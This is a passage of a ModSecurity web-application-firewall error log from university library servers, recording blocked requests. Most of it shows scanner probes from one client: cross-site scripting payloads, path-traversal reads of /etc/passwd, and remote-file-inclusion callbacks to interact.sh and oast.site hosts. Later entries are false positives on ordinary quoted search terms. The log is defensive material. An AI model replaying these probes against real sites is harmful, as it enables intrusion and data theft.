"ZO16o8Co-f0AAAnEqXkAAAAO"]
[Tue Aug 29 11:57:08.651717 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAArbWVAAAAAG"]
[Tue Aug 29 11:57:08.812226 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAAq-HqUAAAAT"]
[Tue Aug 29 11:57:11.533197 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAq5@fAAAAAK"]
[Tue Aug 29 11:57:12.215407 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAq5@ggAAAAK"]
[Tue Aug 29 11:57:18.576458 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAArdQgwAAAAI"]
[Tue Aug 29 11:57:18.830874 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0dxkdd86r1rtsq.oast.site found within TX:1: cjmnijtjmimvgniikdb0dxkdd86r1rtsq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAAoz8dUAAAAS"]
[Tue Aug 29 11:57:19.739612 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAArePHwAAAAJ"]
[Tue Aug 29 11:57:23.738229 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAArePJgAAAAJ"]
[Tue Aug 29 11:57:26.182762 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAAoz8f8AAAAS"]
[Tue Aug 29 11:57:26.221291 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAArePKoAAAAJ"]
[Tue Aug 29 11:57:27.539186 2023] [:error] [pid 2784] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAArgDxAAAAAE"]
[Tue Aug 29 11:57:30.532357 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArePM0AAAAJ"]
[Tue Aug 29 11:57:30.534781 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAq@sqEAAAAM"]
[Tue Aug 29 11:57:30.594084 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAq@sqQAAAAM"]
[Tue Aug 29 11:57:31.659177 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAAnEqewAAAAO"]
[Tue Aug 29 11:57:32.738366 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAAocyuoAAAAR"]
[Tue Aug 29 11:57:33.551129 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAAriwiUAAAAK"]
[Tue Aug 29 14:22:37.221576 2023] [:error] [pid 5829] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Marketing capability\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2cvcCo-f0AABbFNoIAAAAB"]
[Tue Aug 29 14:33:55.419439 2023] [:error] [pid 6136] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MANAJEMEN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2fY8Co-f0AABf4DkYAAAAD"]
[Tue Aug 29 15:01:56.873586 2023] [:error] [pid 6924] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ARYANI, ANNI. Y\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2l9MCo-f0AABsMtW4AAAAP"]
[Tue Aug 29 15:33:48.296626 2023] [:error] [pid 7473] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Corporate social responsibility disclosure\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2tbMCo-f0AAB0xxOEAAAAB"]
[Tue Aug 29 15:57:46.140138 2023] [:error] [pid 8212] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Geoff Thomas\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2zCsCo-f0AACAU7@cAAAAM"]
[Tue Aug 29 16:06:55.885500 2023] [:error] [pid 8396] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Elisa Arrigo\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO21L8Co-f0AACDMXrEAAAAE"]
[Mon Aug 28 10:27:22.924897 2023] [:error] [pid 40257] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22hukum diplomatik\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwUGsCo-f0AAJ1B2IkAAAAN"]
[Mon Aug 28 10:33:24.815675 2023] [:error] [pid 40562] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HASAN, MUHAMAMAD IQBAL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwVhMCo-f0AAJ5yp6gAAAAV"]
[Mon Aug 28 12:05:56.451626 2023] [:error] [pid 42087] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Rizky Malinto Ramdani\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwrNMCo-f0AAKRnIfIAAAAP"]
[Mon Aug 28 12:11:05.788091 2023] [:error] [pid 42257] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SUNARJATI HARTONO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwsacCo-f0AAKURU6EAAAAA"]
[Mon Aug 28 12:52:26.974096 2023] [:error] [pid 43116] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SOLICHIN SALAM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw2GsCo-f0AAKhszkYAAAAK"]
